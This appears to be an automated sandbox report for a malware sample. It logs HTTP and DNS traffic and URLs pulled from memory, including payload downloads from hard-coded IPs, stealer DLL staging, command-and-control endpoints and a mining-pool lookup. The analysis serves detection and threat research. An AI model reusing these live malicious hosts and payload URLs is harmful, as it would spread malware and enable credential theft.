Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/7658082748/wTMEVe8.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/6554834407/ntRoEwh.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/5131681669/KeaEfrP.ps1 HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ogs.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: woo097878781.win
Source: global traffic	DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic	DNS traffic detected: DNS query: pool.hashvault.pro
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz

Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: file.exe, 00000000.00000002.2114430584.0000000001823000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe.
Source: skotes.exe, 0000000C.00000002.2952843084.0000000000609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 0000000C.00000002.2952843084.0000000000609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe(j)
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe08
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe9e
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exeb15
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exec
Source: skotes.exe, 0000000C.00000002.2952843084.0000000000609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exec6~
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exek
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe3
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe8
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exev
Source: file.exe, 00000000.00000002.2114430584.000000000176E000.00000004.00000020.00020000.00000000.sdmp, 50c9f14fb7.exe, 00000023.00000002.2876580011.000000000107E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp, 50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, 50c9f14fb7.exe, 00000023.00000002.2876580011.000000000107E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllz
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll~
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll8
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllF
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllw
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: 50c9f14fb7.exe, 00000023.00000002.2876580011.000000000107E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/user-PC
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113309307.0000000000C57000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2121699779.000000000BF9C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2121699779.000000000BFAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2121699779.000000000BF93000.00000004.00000020.00020000.00000000.sdmp, 50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, 50c9f14fb7.exe, 00000023.00000002.2876580011.000000000107E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php#
Source: file.exe, 00000000.00000002.2121699779.000000000BF9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php$9
Source: 50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/U0R
Source: file.exe, 00000000.00000002.2121699779.000000000BFAA000.00000004.00000020.00020000.00000000.sdmp, 50c9f14fb7.exe, 00000023.00000002.2876580011.000000000107E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2
Source: 50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpC
Source: 50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpO
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpe
Source: file.exe, 00000000.00000002.2121699779.000000000BFAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpmRoot=C:
Source: file.exe, 00000000.00000002.2113309307.0000000000C57000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpser
Source: 50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/n:
Source: file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/s
Source: file.exe, 00000000.00000002.2113309307.0000000000C57000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206c4becf79229cb002.phpser
Source: skotes.exe, 0000000C.00000002.2952843084.0000000000599000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/5131681669/KeaEfrP.ps1
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/5131681669/KeaEfrP.ps1RN###
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/6554834407/ntRoEwh.exe
Source: skotes.exe, 0000000C.00000002.2952843084.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000C.00000002.2952843084.000000000058F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/7658082748/wTMEVe8.exe
Source: skotes.exe, 0000000C.00000002.2952843084.000000000058F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/7658082748/wTMEVe8.exeshqos.dll
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.0000000002952000.00000004.00000800.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.0000000002895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://77.73.39.158
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.0000000002895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://77.73.39.158/4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.00000000028D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://77.73.39.158X
Source: 60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: powershell.exe, 0000001C.00000002.2847630414.00000000077B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: 60c1233683.exe, 00000022.00000002.2958937922.0000000000D23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: 60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: svchost.exe, 00000002.00000002.2970111477.000002554F400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: 60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: svchost.exe, 00000002.00000003.1776028720.000002554F618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000002.00000003.1776028720.000002554F618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000002.00000003.1776028720.000002554F618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000002.00000003.1776028720.000002554F618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000002.00000003.1776028720.000002554F618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000002.00000003.1776028720.000002554F618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000002.00000003.1776028720.000002554F64D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000002.00000003.1776028720.000002554F691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 60c1233683.exe, 00000022.00000003.2784469530.00000000055D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 0000001C.00000002.2777328250.0000000004E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001C.00000002.2777328250.0000000004E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: wVBhC3KCkV.exe, 00000013.00000002.2486333803.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2777328250.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2958021104.0000000002761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001C.00000002.2777328250.0000000004E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001C.00000002.2777328250.00000000052DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://woo097878781.win
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001C.00000002.2777328250.0000000004E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
